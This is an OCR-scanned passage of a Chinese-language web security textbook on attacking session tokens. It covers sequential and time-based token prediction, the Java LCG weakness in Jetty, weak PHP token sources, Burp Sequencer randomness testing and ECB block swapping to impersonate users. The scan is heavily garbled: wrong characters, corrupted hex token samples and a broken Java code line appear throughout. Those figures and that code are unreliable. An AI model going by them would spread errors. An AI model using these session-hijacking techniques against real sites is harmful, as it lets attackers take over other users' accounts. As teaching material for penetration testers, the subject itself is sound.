之 类 的 工具 可 使 猜测 出 的 令 牌 癌 该 页 面 提 出 大 量 请 求 。 监 控 页 面 被 正确 加 载 的 所 有 情况 的 结 
果 ， 这 表示 会 话 令 牌 有 效 。 




































































尝试 访问 
http://mdsec.net/auth/321/ 


http://mdsec.net/auth/329/ 
http://mdsec.net/auth/331/ 


7.2.2 令 牌 可 预测 


一 些 会 话 令 牌 并 不 包含 与 某 个 特定 用 户 有 关 的 任何 有 意义 的 数据 , 但 由 于 它们 包含 菏 种 顺序 
或 模式 ,允许 攻击 者 通过 几 个 令 牌 样本 即 可 推断 出 应 用 程序 最 近 发 布 的 其 他 有 效 令 脾 ,因此 具有 
可 预测 性 。 即 使 推断 过 程 需 要 做 出 大 量 尝 试 ， 并 且 成 功率 极 低 ( 例如， 每 1000 次 尝试 得 到 一 个 有 
效 令 牌 )， 目 动 攻 击 工 具 也 仍然 能 够 利用 这 种 缺陷 在 很 短 的 时 间 内 确定 大 量 有 效 令 牌 。 

与 定制 应 用 程序 相 比 ， 会 话 管理 的 商业 应 用 ( 如 Web 服 务 侣 或 Web 应 用 程序 平台 ) 中 的 令 牌 
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可 预测 漏洞 更 容易 被 发 现 。 当 癌 一 个 定制 会 话 管 理 机 制 实 施 远 程 攻击 时 , 攻击 者 所 能 获得 的 已 发 
布 令 牌 样本 的 数量 可 能 受到 服务 表 容 量 、 其 他 用 户 的 活动 、 市 宽 、 网 络 延 时 等 因 系 的 限制 。 然 而 ， 
在 实验 室 环境 中 , 渗透 测试 员 可 以 迅速 建立 数 百 万 个 令 牌 样本 ， 所 有 样本 都 紧密 相连 ， 并 使 用 了 
时 间 蕉 ， 而 且 可 以 降低 其 他 用 户 造 成 的 干扰 。 

在 最 简单 也 是 最 容易 受到 攻击 的 情况 下 ， 应 用 程序 使 用 一 个 人 简单 的 连续 数字 作为 会 话 令 
有 牧 。 这 时 ,攻击 者 只 和 需 获 得 两 个 或 三 个 令 牌 样本 就 可 以 实施 攻击 ， 并 立即 稚 获 当前 有 效 的 所 有 
令 牌 。 

图 7-1 表 示 正 在 使 用 Burp Intruder 循 环 访问 一 个 连续 会 话 令 牌 的 最 后 两 位 数字 ， 以 查找 会 话 仍 
处 于 活动 状态 可 被 劫持 的 令 牌 值 。 这 时 ,服务 带 啊 应 的 长 度 是 发 现 有 效 会 话 的 可 靠 指标 。 并 且 从 
中 提取 的 grep 特 性 也 可 用 于 显示 每 个 会 话 登 录用 户 的 用 户 名 。 
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“ params | headers | hex 


GET /auth/340/Home.ashx HTTP/1.1 

Host: mdsec.net 

User-Agent: Nozilla/5.0 (Windows; U; Vindovs NT €.1; en~-GB; rv:1.9.2.10) 
Gecko/20100914 Firefox/3.6.10 

Accept: text/html,application/xhtml+xml,application/xml;dq=0.9,*/*;d=0.8 
Accept-Landguage: en-gb,en;dq=0.5 

Accept-Encoding; gzipdeflate 

Accept-Charset: ISO-8859-1,utf-8;d=0.7,*;d=0.7 

Keep-Alive: 115 

Connection: close 

Referer: https://mdsec.net/auth/340/Default.ashx 

Cookie: Sessionld=5160€2E93E9FB22 


finished 








图 7-1 会 话 令 牌 可 预测 时 查找 有 效 会 话 的 一 次 攻击 


在 其 他 情况 下 , 应 用 程序 令 牌 中 可 能 包含 更 加 复杂 的 序列 , 需要 付出 一 定 的 努力 才能 发 现 。 
序列 的 变化 形式 可 能 多 种 多 样 ， 但是， 根据 我 们 的 行业 经 验 ， 可 预测 的 会 话 令 牌 通常 来 日 3 个 
方面 : 

口 隐 仿 序列; 

口 时 间 依 赖 ; 

口 生成 的 数字 随机 性 不 强 。 

我 们 将 分 别 讨论 这 3 种 情况 。 
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1. 隐 含 序列 

有 时 ， 对 会 话 令 牌 的 原始 形式 进行 分 析 可 能 无 法 预测 它们 ; 但 是 ,对 其 进行 适当 解码 或 解 译 
就 可 以 揭示 其 中 包含 的 序列 。 

以 下 面 一 组 值 为 例 ， 它 是 一 个 结构 化 会 话 令 牌 的 组 成 成 分 : 

1w]VJA 

LS3AJG 

XPDKI+A 

XlexYog 

9hnyCzA 

J EFUNG 

Ja2Z20A 

一 眼看 来 ， 其 中 并 不 包含 任何 模式 。 然 而 ,粗略 检查 后 发 现 , 令 脾 中 可 能 包含 Base64 编 码 的 
数据 ， 除 大 小 写 混合 的 字母 和 数字 字符 外 ， 其 中 还 有 一 个 + 字符 ， 它 也 是 一 个 有 效 的 Base64 字 符 
串 。 使 用 Base64 解 码 妖 对 令 脾 解码 ， 得 到 以 下 结果 : 

二 

,TAZ 

瑟 ' < 人 

^W-—b 

Sl 

?a&n6 


Sl!Y 
很 明显 ， 这 些 字 符 串 是 乱 码 ,并 且 其 中 包含 非 打 印字 符 。 通 关 来 说 ,这 表示 处 理 的 是 二 进 制 
数据 ， 而 非 ASCI 文 本 。 将 解码 后 的 数据 以 十 六 进 制 表 示 ， 得 到 : 
9708D524 
2ERCDCO8E 
C692ABF8 
5E579762 
F61C82CC 


8DEl16E36 
25A659A0 
其 中 仍然 没有 明显 的 模式 。 然 而 ， 如 果 用 前 一 个 数字 减 去 后 一 个 数字 ， 就 会 得 到 以 下 结 
FF97CAEBSOA 
97CAEBOA 
FF97TCAERBOA 
97CAEBOA 
FF97CAEBSOA 
FF97TCAEBOA 


隐 含 的 模式 立即 显露 出 来 。 生 成 令 牌 的 算法 如 下 : 用 前 一 个 值 加 上 0x97C4EB6A， 把 结果 截 短 成 
一 个 32 位 的 数字 ， 并 对 这 个 二 进 制 数据 进行 Base64 编 码 ， 使 其 能 够 通过 基于 文本 的 HTTP 协 议 传 
输 。 了 解 到 这 一 点 ， 就 能 轻易 编写 出 一 段 脚本 ， 生 成 服务 需 接 下 来 产生 的 令 牌 ， 以 及 它 在 被 截获 
的 样本 之 前 产生 的 令 牌 。 
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2. 时 间 依赖 


一 些 Web 服 务 胡 和 应 用 程序 使 用 时 间作 为 令 牌 值 的 输入 ,通过 茶 种 算法 生成 会 话 令 牌 。 如 采 














没有 在 算法 中 合并 足够 的 炉 "， 攻 击 者 就 可 能 推测 出 其 他 用 户 的 令 牌 。 虽 然 任 何 特定 的 令 牌 序列 


本 号 是 完全 随机 的 , 但是， 如 末 组 合生 成 每 个 令 牌 的 时 间 1 





也 许可 以 发 现 茶 种 可 以 辨别 的 模 


式 。 一 个 忙碌 的 应 用 程序 每 秒 会 生成 大 量 的 会 话 ,， 因此 实施 一 次 日 定义 攻击 就 可 以 成 功 确定 其 他 
用 户 的 大 量 令 牌 。 


性 
字 


沌 于 ,通过 灾 力 攻击 发 现 序 列 中 的 有 效 值 。 不 过 , 在 开始 攻击 前 ， 等 
牌 序列 : 


测试 一 家 网 上 零售 商 的 Web 应 用 程序 时 ， 我 们 遇 到 以 下 令 牌 序列 : 


23124538-1172764258718 
3124539-1172764259062 
3124540-1172764259281 
3124541-1172764259734 
23124542-1172764260046 


3124543-1172764260156 
3124544-1172764260296 


3124545-1172764260421 
3124546-1172764260812 
3124547-1172764260890 








很 明显 ， 每 个 令 牌 由 两 个 独立 的 数字 组 成 : 前 一 个 数字 的 递增 模式 非 笛 简单 ， 很 容易 推测 。 
后 一 个 数字 的 递增 值 每 次 和 都 有 所 变化 。 计 算出 每 个 连续 令 牌 的 递增 值 ， 得 到 以 下 结 采 : 





3344 
219 
4523 
312 
110 
140 
125 
391 
78 








这 个 序列 并 不 包含 可 预测 的 模式 。 但 显而易见 的 是 , 攻击 者 可 以 通过 目 动 攻击 确定 相关 的 数 








3124553-1172764800468 
3124554-1172764800609 
3124555-1172764801109 
3124556-1172764801406 
3124557-1172764801703 
3124558-1172764802125 
3124559-117276480250C 
3124560-1172764802656 
323124561-1172764803125 
23124562-1172764803562 
































中 
待 几 分 钟 后 可 截取 另 一 个 


中 在 信息 论 中 ,和 (entropy ) 可 用 作 某 事件 不 确定 度 的 量度 。 信 息 量 越 大 ， 体 系 结构 越 规则 ， 功 能 越 完 善 ， 入 就 越 小 。 


一 一 译 者 注 
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将 这 个 令 牌 序列 与 第 一 个 序列 进行 比较 ， 立 即 得 到 两 个 明显 的 结论 。 

口 第 一 个 数字 序列 继续 递增 ， 但 是 ， 第 一 个 数字 序列 后 面 遗 漏 了 5 个 值 。 这 可 能 是 因为 应 用 

程序 向 其 他 用 户 发 布 了 这 5 个 值 ， 他 们 在 两 次 测试 的 间 际 登录 了 应 用 程序 。 

口 第 二 个 数字 序列 继续 增 大 ， 其 递增 形式 与 第 一 个 序列 类 似 。 但 是 ， 得 到 的 第 一 个 值 比 前 

一 个 值 大 539 578， 大 了 许多 。 

第 二 次 观测 的 结果 立即 让 人 产生 警惕 ， 推 测 时 间 在 会 话 令 牌 生成 过 程 中 发 挥 的 作用 。 显 然 ， 
在 两 次 截取 令 牌 的 过 程 中 ， 应 用 程序 只 发 布 了 5$ 个 令 牌 。 然 和 而， 时 间 已 经 过 去 将 近 10 分 钟 。 最 可 
能 的 解释 是 : 令 牌 以 秒 为 时 间 依 赖 ， 并 可 能 以 训 秒 计算 。 

确实 ， 预 感 是 正确 的 。 在 随后 的 测试 过 程 中 进行 一 次 代码 审查 ， 可 发 现 以 下 令 牌 生成 算法 : 


String sessId = Integer.toSstring(s SessionIndext+t+}) + 




















0 一， 十 


System.currentTimeMillist(); 
考虑 对 如 何 生 成 令 牌 所 做 的 分 析 , 攻击 者 可 以 朋 接 构造 一 个 日 定义 攻击 , 获得 应 用 程序 加 其 
他 用 户 发 布 的 会 话 令 牌 。 

口 继续 从 服务 带 中 提取 权 密 相连 的 新 会 话 令 牌 。 

口 监控 第 一 个 数字 的 递增 情况 。 如 于 递增 值 大 于 1， 可 知道 应 用 程序 加 其 他 用 尸 发布 了 一 个 
令 牌 。 

口 问 其 他 用 户 发 布 一 个 令 牌 时 ， 可 立即 知道 发 布 时 间 的 秒 上 限 和 下 限 ， 因 为 攻击 者 拥有 在 
这 个 令 牌 之 前 和 之 后 发 布 的 令 牌 。 由 于 不 断 获 得 新 会 话 令 牌 ， 这 些 界 限 之 间 通 和 只 包 合 
几 百 个 值 。 

口 应 用 程序 每 次 加 其 他 用 户 发 布 一 个 令 牌 ， 攻 击 者 就 实施 一 次 查 力 攻击 过 历 这 个 范围 内 
的 每 个 数字 ， 并 把 这 个 数字 附加 到 已 经 发 布 给 其 他 用 户 的 第 一 个 数字 序列 后 面 。 攻 击 

尝试 使 用 建立 的 每 个 令 牌 访问 一 个 受 保护 的 页 面 ， 直 到 尝试 取得 成 功 ， 攻 破 该 用 户 
的 会 话 。 

口 继续 运行 这 个 目 定 义 攻击 即 可 截获 其 他 所 有 应 用 程序 用 户 的 令 牌 。 一 名 管理 用 户 登 录 后 ， 

整个 应 用 程序 将 被 完全 攻破 。 


党 试 访问 
http://mdsec.net/auth/339/ 
http://mdsec.net/auth/340/ 
http://mdsec.net/auth/347/ 
http://mdsec.net/auth/351/ 






























































3. 生成 的 数字 随机 性 不 强 

计算 机 中 的 数据 极 少 完全 随机 。 因 此 ,如 采 由 于 茶 种 原因 需要 随机 数据 ,一 般 通 过 软件 使 用 
各 种 技巧 生成 伪 随 机 数字 。 所 使 用 的 一 些 算 法 生成 看 似 随 机 并 且 在 可 能 的 数值 范围 内 平均 分 布 的 
序列 ， 但 有 些 人 只 需要 少数 几 个 样本 ， 仍 然 能 够 准确 推导 出 整个 序列 。 
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如 采 使 用 一 个 可 预测 的 伪 随 机 数字 发 生 融 生成 会 话 令 牌 , 那么 得 到 的 令 牌 就 多 于 受到 攻击 者 
的 攻击 。 

Jetty 是 一 种 完全 以 Java 编 写 的 稼 用 Web 服 务 句 ， 它 为 在 其 上 运行 的 应 用 程序 提供 一 种 会 话 管 
理 机 制 。2006 年 ，NGSSoftware 的 Chris Anley 发 现 这 种 机 制 易 于 受到 会 话 令 牌 预测 攻击 。 该 服务 
人 套 使 用 Java API java.util.Random 生 成 会 话 令 胆 。 它 执行 一 个 “线性 同 余 发 生 需 ”( linear 
congruential generator )， 通 过 以 下 算法 生成 序列 中 的 下 一 个 数字 : 

synchronized protectedqd int next (int bits) { 


Seeqd = {seeqd * OxS5SDEECE66DL + OxBL) & ((1L << 48) — 1): 


return (int) (seeqd >>> (48 - bits})); 








} 
这 种 算法 实际 上 是 用 生成 的 最 后 一 个 数字 乘 以 一 个 稼 数 , 再 加 上 为 一 个 生 数 ,生成 下 一 个 数 
字 。 得 到 的 数字 被 截 短 至 48 位 ; 然后 ， 算 法 再 将 结 来 进行 转换 ， 返 回 请 求 方 要 求 的 位 数 。 
了 解 了 这 种 算法 和 由 它 生成 的 一 个 数字 后 ,就 可 以 轻易 推算 出 接 下 来 将 要 生成 的 数字 , 并 且 
(利用 一 点 数论 知识 ) 推导 出 它 之 前 生成 的 数字 。 这 意味 春 攻击 者 只 需 从 服务 郁 获 得 一 个 会 话 令 
牌 ， 驶 可 推测 出 所 有 当前 和 将 来 的 会 话 令 牌 。 























注解 ”有 时 ， 令 牌 根据 一 个 伪 随 机 数字 发 生 器 的 输出 而 生成 ， 因 此 开发 者 决定 将 发 生 
器 的 几 个 连续 输出 连接 起 来 建立 每 个 令 牌 。 开 发 者 认为 使 用 这 种 方法 可 建立 一 个 更 长 


因而 “更 强大 ”的 令 牌 。 但 是 ， 这 种 策略 通常 是 一 种 误解 。 如 果 攻 击 者 能 够 获得 发 生 
器 生成 的 几 个 连续 输出 ， 他 们 就 可 以 通过 它们 推断 出 发 生 器 内 部 状态 的 一 些 信息 ， 因 
此 更 容易 向 前 或 向 后 推导 发 生 器 的 输出 顺序 。 











其 他 非 定 制 应 用 程序 框架 在 生成 会 话 令 牌 时 使 用 极其 简单 或 可 预测 的 炉 源 , 其 中 许多 信 源 其 
至 可 以 确定 。 例 如 ，PHP 框 架 5.3.2 及 早期 版 本 基于 客户 痢 的 IP 地 址 、 生 成 令 牌 时 的 纪元 时 间 、 生 
成 令 脾 时 的 微 秒 ,以 及 线性 同 余 发 生 带 来 生成 会 话 令 牌 。 虽然 其 中 有 几 个 未 知 值 , 但是， 一 些 应 
用 程序 可 以 披露 相关 信息 ， 从 而 推断 出 这 些 值 。 社交 网 络 站 点 可 能 会 记录 用 户 的 登录 时 间 和 IP 地 
址 。 此 外 ， 该 发 生 融 使 用 的 种 子 是 PHP 进 程 启 动 的 时 间 ， 如 采 攻 击 者 对 服务 硕 进 行 监视 ， 就 可 以 
将 这 个 值 缩 定 在 一 个 很 小 的 范 于 内 。 











注解 ”这 是 一 个 不 断 发 展 的 研究 领域 。2001 年 ，Full Disclosure 邮 件 列 表 指 出 PHP 会 话 


令 牌 生成 过 程 存在 缺陷 ， 但 并 未 证 实 该 缺陷 可 被 利用 。2010 年 ，Samy Kamkar 最 终 使 
用 phpwn 工 具 实 现 了 对 这 一 缺陷 的 利用 。 





4. 测试 随机 性 强度 
菏 些 时 候 , 仅仅 通过 观察 , 或 者 通过 适度 的 手动 分 析 , 就 可 以 确定 一 系列 令 脾 的 模式 。 但 是 ， 
通 津 而 言 ， 需 要 使 用 更 加 严格 的 方法 来 测试 应 用 程序 令 牌 的 随机 性 强度 。 
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完成 测试 的 标准 方法 是 应 用 统计 假设 测试 原则 , 并 采用 各 种 严格 的 测试 查找 令 牌 样本 的 非 随 
机 性 。 测 试 过 程 的 主要 步骤 如 下 。 

(1) 首先 ， 假 设 令 牌 是 随机 生成 的 。 

(2) 进行 一 系列 测试 ， 通 过 每 个 测试 观察 可 能 具有 某 些 特征 的 令 牌 样本 〈 如 果 令 牌 是 随机 生 
成 的 ) 的 特定 属性 。 

(3) 对 于 每 个 测试 ， 假 定 以 上 假设 是 正确 的 ， 计 算 观 察 到 的 特征 发 生 的 机 率 。 

(4) 如 有 果 该 几率 在 某 一 水 平 ( 显著 性 水 平 ) 之 下 ， 则 和 否定 上 述 假设 ， 并 得 出 结论 一 一 令 牌 不 
是 随机 生成 的 。 

邓 和 运 的 是 ， 并 不 需要 手动 完成 上 述 步骤 ! 当前 ，Burp Sequencer 是 测试 Web 应 用 程序 令 牌 随 
机 性 的 最 佳 工具 。 该 工具 可 灵活 进行 各 种 标准 测试 ， 并 为 你 提供 易于 解释 的 明确 结果 。 

要 使 用 Burp Sequencer， 需 要 从 发 布 希 望 进 行 测试 的 令 牌 的 应 用 程序 中 找到 一 个 啊 应 ， 如 应 
用 程序 对 发 布 包含 会 话 令 牌 的 新 cookie 的 登录 请 求 做 出 的 啊 应 。 然 后 ， 从 Burp 的 上 下 文 来 单 中 选 
择 “ 发 送 至 sequencer”( send to sequencer )， 并 在 Sequencer 配 置 中 设置 令 有 牌 在 啊 应 中 的 位 置 ， 如 
图 7-2 所 示 。 还 可 以 配置 各 种 确定 如 何 收 集 令 牌 的 选项 ， 然 后 单 击 “ 开 始 捕获 ”( start capture ) 按 
钮 ， 开 始 收集 令 胆 。 如 条 已 经 通过 其 他 方法 (例如 ， 通 过 保存 某 次 Burp Intruder 攻 击 的 结果 ) 获 
得 适当 的 令 牌 样本 ， 则 可 以 使 用 “手动 加 载 ”( manual load ) 选项 卡 跳 过 令 租 收集 过 程 ， 直 接 进 
入 统计 分 析 阶 段 。 
































仿 i > Eo TT | 
ON Ee-Ee 芭 
burp intruder repeater window help 





| target | proxy spider | scanner | intruder | repeater 人 sequencer | decoder | comparer options | alerts 


”we capture | manualload | options 








select request 


POST /auth/36 /Defaultashx HTTP/1.1Host mdsec.netUser-Agent Mozillals.0 ... remove 


Clear 








identify token in response 
“ token location | capture options | 
®) cookie: Sessionld=1AD2E16799E692A3 | 


DO manual selection: 











MicrosoftOfficeWebserver: 5.0 Pub 

X-Powered-By: ASP.NET 

X-ASpNet-Version: 2.0.50727 

Location: /auth/361/Home.ashx 

Set-Cookie: SessionId=1AD2E16799E692A3; Secure;: HttpOnly 
Cache-Control: no-cache 

IPradqma: no-cache 


| token ends: 
[x lz | || | 0matches 
@®) at delimiter- 


| token starts: 


®) after expression: | 


局 at offset | 




















| 














| 
start capture 


图 7-2 将 Burp Sequencer 配 置 为 测试 会 话 令 牌 的 随机 性 
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获得 适当 的 令 牌 样本 后 ,就 可 以 对 样本 进行 统计 分 析 了 。 还 可 以 在 收集 样本 的 同时 进行 中 间 
分 析 。 一 般 来 说 ， 获 得 更 多 样本 可 提高 分 析 的 可 靠 性 。Burp 需 要 的 最 小 样本 大 小 为 100 个 令 牌 ， 
但 最 好 是 收集 更 多 样本 。 如 果 在 分 析 几 百 个 令 牌 后 ， 结 论 表明 令 牌 没有 通过 随机 性 测试 ， 那 么 ， 
As 

令 牌 ,并且 结 论 表 明 这 些 令 牌 通过 了 随机 性 测试 ， 则 可 以 确定 这 文 一 数量 已 经 足够 。 但是， 为 符 
ii 需要 获得 20 000 个 令 牌 样本 ， 这 是 Burp 文 持 的 最 大 样本 大 小 。 

Burp Sequencer 在 字符 和 位 级 别 执行 统计 测试 。 所 有 测试 结果 将 进行 汇总 ， 以 对 令 牌 中 的 有 
效 箭 的 位 数 (这 是 需要 考 奈 的 大 键 和 水 ) 进行 总体 评 信 。 但 是 , 还 可 以 深入 分 析 每 项 测试 的 结 
了 解 令 牌 的 不 同 部 分 如 何以 及 为 何 通 过 或 未 通过 每 项 测试 ， 如 图 7.3 所 示 。 用 于 每 类 测试 的 方法 
在 测试 结果 下 面 进行 了 说 明 。 











copy tokens auto analyse ‘next: 2000) requests: 1686 


[summary | character-level analysis | bitlevel analysis | options 


' FIPS runs test | FIPS long runs test | spectraltests | correlation | compression | bitconversion | 


summary FIPS monobit test FIPS pokertest 





FIPS runs test - significance levels 


100% 


| | | | | FIPS pass level 
=0.0001% 网 | | 由 


bit position 


FIPS resuit 
52 bits passedthe test The following 10 bits failed the test: 0, 1 2. 3,4,5,6, 18, 36, 42. 


Anomalies 
44 anomalies were identified in this test: 
number of 2-bit runs is too small at bit 0 (count 10, probability in a random sample: less than 0.0001%) 





图 7-3 ”分 析 Burp Sequencer 结 果 以 了 解 所 测试 令 牌 的 属性 
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需要 注意 的 是 ，Burp 会 对 令 牌 中 的 每 个 字符 和 数据 位 单独 进行 所 有 测试 。 许 多 时 候 ， 你 会 发 
现 ， 大 部 分 的 结构 化 令 牌 部 不 是 随机 的 , 这 本 号 并 不 表示 存在 任何 类 型 的 缺陷 。 重 要 的 是 , 令 有 牌 
应 包含 足以 通过 随机 性 测试 的 位 数 。 例如， 如 果 某 个 大 令 脾 包含 1000 位 信息 , 但 其 中 只 有 50 个 位 
通过 了 随机 性 测试 ,那么 ， 总 体 而 言 ， 该 令 牌 还 不 如 一 个 完全 通过 随机 性 测试 的 30 位 令 牌 可 徘 。 











注解 在 进行 随机 性 统计 测试 时 ， 请 记 住 两 个 要 点 。 这 些 要 点 会 影响 你 对 测试 结果 的 
解释 ， 并 会 影响 应 用 程序 的 安全 状态 。 首 先 ， 以 完全 确定 的 方式 生成 的 令 牌 可 能 会 通 
过 随机 性 统计 测试 。 例 如 ， 线 性 同 余 伪 随机 数字 发 生 器 ， 或 计算 连续 数字 的 散 列 的 算 
法 , 可 能 会 生成 通过 测试 的 输出 ,但 是 , 如 果 攻 击 者 了 解 该 算法 和 发 生 器 的 内 部 状态 ， 
就 可 以 非常 准确 地 正 向 或 北向 推断 出 它 的 输出 。 

其 次 ， 未 通过 随机 性 统计 测试 的 令 牌 实际 上 也 许 根本 无 法 预测 。 如 果 令 牌 中 的 特 


定数 据 位 没有 通过 测试 ， 这 只 是 说 明 在 该 位 置 观察 到 的 数据 位 序列 包含 真正 随机 的 令 
牌 中 不 可 能 出 现 的 特征 。 但 是 ， 如 果 尝 试 根据 观察 到 的 特征 预测 该 数据 位 在 下 一 个 令 
牌 中 的 值 ， 这 样 的 做 法 无 异 于 育 目 猜测 。 鉴 于 需要 同时 预测 大 量 数 据 位 ， 作 出 正确 预 
测 的 机 率 非 常 低 。 





渗透 测试 步骤 

(1) 从 第 一 个 应 用 程序 页 面 到 任何 登录 功能 ， 遍 历 应 用 程序 ， 确 定 其 何 时 以 及 如 何 发 布 会 
话 令 牌 。 以 下 两 种 行为 较为 常见 : 

口 只 要 收 到 未 提交 令 牌 的 请 求 ， 应 用 程序 就 会 创建 新 会 话 ; 
口 应 用 程序 在 成 功 登 录 后 创建 新 会 话 。 

要 想 目 动 收集 大 量 令 牌 , 最 好 的 办 法 是 确定 一 个 导致 应 用 程序 发 布 新 令 牌 的 请 求 ( 通 和 为 
GET/ 或 登录 请 求 )。 

(2) 在 Burp Suite 中 ， 向 Burp Sequencer 发 送 创建 新 会 话 的 请 求 ， 并 配置 令 牌 的 位 置 。 然 后 
启动 实时 捕获 , 收集 尽 可 能 多 的 令 牌 。 如 果 应 用 程序 采用 了 定制 会 话 管理 机 制 , 则 只 能 远程 访 
问 该 应 用 程序 ,你 可 以 尽 可 能 迅速 地 收集 令 牌 ， 以 尽量 防止 丢失 发 布 给 其 他 用 户 的 令 牌 , 并 降 
低 时 间 依 赖 造 成 的 影响 。 

(3) 如 果 应 用 程序 采用 商业 会 话 管理 机 制 并 且 / 或 者 你 可 以 本 地 访问 该 应 用 程序 ， 则 可 以 在 
受 控 条 件 下 获得 无 数 会 话 令 牌 。 

(4) 在 Burp Sequencer 收 集 令 牌 的 同时 ， 启 动 “自动 分 析 ”( auto analyse ) 设置 ， 使 Burp 定 
期 自动 执行 统计 分 析 。 至 少 收集 500 个 令 牌 ， 然 后 详细 审查 分 析 结 果 。 如 果 令 牌 中 有 足够 的 数 
据 位 通过 了 测试 ， 继 续 尽 可 能 长 时 间 地 收集 令 牌 ， 并 在 收集 其 他 令 牌 时 审查 分 析 结果 。 

(5) 如 果 令 牌 未 通过 随机 性 测试 ， 并 且 似 乎 包含 可 用 于 预测 将 来 令 牌 的 模式 ， 则 可 以 从 另 
一 个 IP 地 址 、 使 用 不 同 的 用 户 名 ( 如 果 相 关 ) 重新 开始 收集 令 牌 的 操作 。 这 有 助 于 确定 是 否 能 
人 够 发 现 相 同 的 模式 ,以 及 是 否 能 够 根据 前 一 次 操作 获得 的 令 牌 进行 推 产 , 确定 后 一 次 操作 得 到 
的 令 牌 。 有 时 候 ， 一 个 用 户 收 集 的 令 牌 序列 表现 出 某 种 模式 ， 但 因为 来 源 耻 地 址 之 类 的 信息 被 
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用 作 燃 源 ( 如 随机 数 子 发生 带 的 种 子 )， 通 过 这 种 模式 并 不 能 推 基 出 回 其 他 用 户 发 布 的 令 牌 。 
(6) 如 琳 攻 击 者 认为 已 经 充分 了 解 令 牌 生成 算法 ,能 够 回 其 他 用 尸 的 会 话 发 动 目 动 攻击 ， 
通过 一 段 定 制 脚本 实施 攻击 可 能 是 最 好 的 方法 ， 因 为 它 能 够 使 用 观测 到 的 特定 模式 生成 令 牌 ， 
并 应 用 任何 必需 的 编码 。 请 参阅 第 14 草 了 解 在 这 种 情况 下 应 用 某 些 常规 技巧 的 信息 。 
(7) 如 条 可以 查看 源 代 码 ， 则 应 仔细 检查 负责 生成 会 话 令 牌 的 代码 ， 了 解 它 使 用 的 机 制 ， 
并 确定 是 否 可 以 轻易 预测 该 令 牌 。 如 末 确 定 能 够 对 从 应 用 程序 数据 中 提取 的 箭 实施 重力 攻击 ， 
这 时 和 需要 考虑 对 应 用 程序 令 牌 实施 蛋 力 攻击 所 知 的 具体 请 求 数 。 














尝试 访问 
http://mdsec.net/auth/361/ 


7.2.3 加 密令 牌 


一 些 应 用 程序 使 用 包含 用 户 有 意义 信息 的 令 牌 , 并 通过 在 回 用 户 发 布 令 牌 之 前 对 令 牌 进行 加 
密 来 避免 这 种 做 法 导致 的 明显 问题 。 由 于 使 用 了 用 户 未 知 的 密 钥 对 令 牌 进行 加 密 , 这 种 方法 似乎 
较为 稳妥 ， 因 为 用 户 无 法 解密 令 有 牌 并 算 改 其 内 容 。 

但 是 , 在 某 些 情况 下 ,根据 所 采用 的 加 密 算法 以 及 应 用 程序 处 理 令 牌 的 方式 ,用户 甚至 不 需 
要 解密 令 牌 ， 就 可 以 算 改 令 牌 中 有 意义 的 内 容 。 这 上 听 起 来 可 能 有 些 上 匪夷所思 , 但 实际 上 ， 这 些 攻 
击 确实 可 行 ， 而 且 有 时 轻易 就 可 以 实施 ; 事实 证 明 ， 现实 世界 中 的 许多 应 用 程序 都 易于 受到 这 种 
攻击 。 不 过 ， 这 类 攻击 是 否 可 行 ， 要 取决 于 加 密令 牌 时 所 采用 的 具体 加 密 算法 。 

1. ECB 密 码 

采用 加 密令 牌 的 应 用 程序 使 用 对 称 加 密 算 法 , 用 于 解密 用 户 返回 的 令 牌 , 恢复 令 牌 中 有 意义 
的 内 容 。 一 些 对 称 加 密 算法 使 用 “电子 密码 本 ”( ECB ) 密码 。 这 种 密码 将 明文 划分 成 同等 大 小 
的 分 组 ( 如 每 组 8 个 学 市 ), 然后 使 用 密 钥 加 密 每 个 分 组 。 在 解密 过 程 中 ， 青 使 用 相同 的 密 钥 对 每 
个 密 文 分 组 进行 解密 , 将 其 恢复 为 原始 的 明文 分 组 。 这 种 加 密 方法 有 一 个 特点 ， 即 如 果 明 文 分 组 
存在 某 种 模式 , 这 可 能 导致 密 文 分 组 也 存在 一 定 的 模式 ,因为 明文 分 组 与 加 密 后 的 密 文 分 组 完全 
相同 。 对 于 某 些 类 型 的 数据 ( 如 位 图 图 像 ) 而 言 , 这 意味 着 可 以 从 密 文 判断 明文 中 的 有 意义 信息 ， 
如 图 7-4 所 示 。 



























































图 7-4 ”使 用 ECB 密 码 加 密 的 明文 中 的 模式 可 能 会 在 生成 的 密 文中 可 见 
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尽管 ECB 存 在 上 述 缺 点 ， 但 Web 应 用 程序 仍然 经 党 使 用 这 类 密码 来 加 密 信 息 。 





即使 “明文 模 


式 ” 问 题 不 会 出 现 ， 这 种 加 密 方法 仍然 存在 独 洞 。 这 主要 是 因为 它 的 明文 分 组 与 密 文 分 组 完全 对 
应 所 致 。 


以 下 面 的 应 用 程序 为 例 , 该 应 用 程序 的 令 牌 包含 几 个 不 同 的 有 意义 组 件 , 包括 一 个 数字 用 户 


标识 符 : 


rnd=2458992;app=iTradeEUR 1;uid=218;username=dafydd;time=634430423694715 


O000; 





对 这 个 令 牌 进行 加 密 后 ， 它 变 得 没有 任何 意义 ， 并 且 可 能 通过 所 有 标准 的 随机 性 统计 测试 : 


68BAC980742B9IEF80A27CBBBCO618E3876FF3DOCOE6A7TBICB8FCAA86F9E11922776F0307 
329140AABD223FO003A8309DDB6B970C47BA2E249A0670592D74BCDO D51A3E1SOEFC2E69 
885A5C8131E4210F 


ECB 和 密码 用 于 加 密 8 字 市 的 分 组 ， 其 明文 分 组 与 对 应 的 密 文 分 组 如 下 所 示 : 





rnd=2458 68BAC980742B9EF8 
992;app= OA27CBBBCO618E38 
iTradeEU 76FE3D6C6E6RA7B9C 
R_1;uid= BS8FCAA86F9E11922 
218;uUSer 776FO0307329140AA 
name=dat BD223F003A8309DD 
ydd; time B6B970C47BA2E249 
=6344304 AO670592D74BCDO7 
23694715 DS5TA3ETSOEFC2E69 
OOO 1 885A5C8131E4210F 





现在 ,由 于 每 个 密 文 分 组 将 始终 解密 成 同一 个 明文 分 组 , 因此 , 攻击 者 就 可 以 改变 密 文 分 组 








的 顺序 ， 以 某 种 有 意义 的 方式 修改 对 应 的 明文 分 组 。 根 据 应 用 程序 处 理 生成 的 加 密令 牌 的 具体 方 
式 ， 攻 击 者 可 以 通过 这 种 方法 切换 到 其 他 用 户 ， 或 提升 日 己 的 权限 。 


例如 ， 如 果 将 第 二 个 分 组 复制 到 第 四 个 分 组 之 后 ， 将 得 到 如 下 所 示 的 分 组 序列 : 


rnd=2458 68BAC980742B9EF8 
992;app= OA27CBBBCO618E38 
iTradeEU 76FEFE3D6C6E6RA7B9C 
R_1;u1id= BB8FCAA486F9E11922 
992;app= OA27CBBBCO0O618E38 
218;user 776F0307329140AA 
name=dat BD223F003A8309DD 
